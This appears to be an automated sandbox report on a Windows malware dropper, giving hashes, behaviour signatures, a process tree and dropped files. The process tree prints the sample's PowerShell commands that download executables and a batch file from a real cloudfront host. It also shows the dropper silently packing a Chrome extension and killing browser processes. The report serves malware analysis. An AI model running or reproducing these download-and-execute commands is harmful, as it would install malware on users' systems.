Analysis

  • max time kernel
    247s
  • max time network
    299s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    16/05/2024, 22:59

General

  • Target

    3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe

  • Size

    49KB

  • MD5

    213c0265511727869c959abd24ea3677

  • SHA1

    22ea6fe23eeb57d0048d1b0e2a826dd66c6969d9

  • SHA256

    3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7

  • SHA512

    bfa4d229ade2e47d91f3fb761e68f727aab86980a2697cb06955324e9b61b384569a285edfaa1d1dd7aea95e24d171a770a4f573a19ec795325c68250720f41e

  • SSDEEP

    1536:XferrLkSRoe8C4UZsys0Dh1duFpxFI+PlZ:Xfi3k+oWDBDh1duFpkWlZ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=458&c=1000

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 2 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe
    "C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:4676
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nss66D9.tmp\est.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4860
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:888
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=458&c=1000','i0.exe')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2124
      • C:\Users\Admin\AppData\Local\Temp\i0.exe
        i0.exe /verysilent /sub=1000
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:5016
        • C:\Users\Admin\AppData\Local\Temp\is-TDRD6.tmp\i0.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-TDRD6.tmp\i0.tmp" /SL5="$C01FE,2859366,899584,C:\Users\Admin\AppData\Local\Temp\i0.exe" /verysilent /sub=1000
          4⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Drops file in Program Files directory
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4132
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\lazyhh > "C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\~execwithresult.txt""
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2148
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\lazyhh
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2224
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7fffd6b39758,0x7fffd6b39768,0x7fffd6b39778
                7⤵
                  PID:3268
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""openssl.exe" rsa -in .\lazyhh.pem -pubout -outform DER > "C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\~execwithresult.txt""
              5⤵
                PID:4200
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /f /im "msedge.exe"
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3420
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /f /im "chrome.exe"
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2088
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')"
            3⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1496

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

        Filesize

        1KB

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        16KB

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        16KB

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4m5kwxvo.vwm.ps1

        Filesize

        1B

      • C:\Users\Admin\AppData\Local\Temp\i0.exe

        Filesize

        3.5MB

      • C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\chrome.zip

        Filesize

        47KB

      • C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\dlls.manifest

        Filesize

        208B

      • C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\lazyhh.crx

        Filesize

        49KB

      • C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\lazyhh.pem

        Filesize

        1KB

      • C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\lazyhh\icons\icon-128.png

        Filesize

        8KB

      • C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\lazyhh\icons\icon-34.png

        Filesize

        3KB

      • C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\lazyhh\js\background.js

        Filesize

        108KB

      • C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\lazyhh\manifest.json

        Filesize

        438B

      • C:\Users\Admin\AppData\Local\Temp\is-TDRD6.tmp\i0.tmp

        Filesize

        3.1MB

      • C:\Users\Admin\AppData\Local\Temp\nss66D9.tmp\est.bat

        Filesize

        735B

      • \Users\Admin\AppData\Local\Temp\nss66D9.tmp\INetC.dll

        Filesize

        25KB
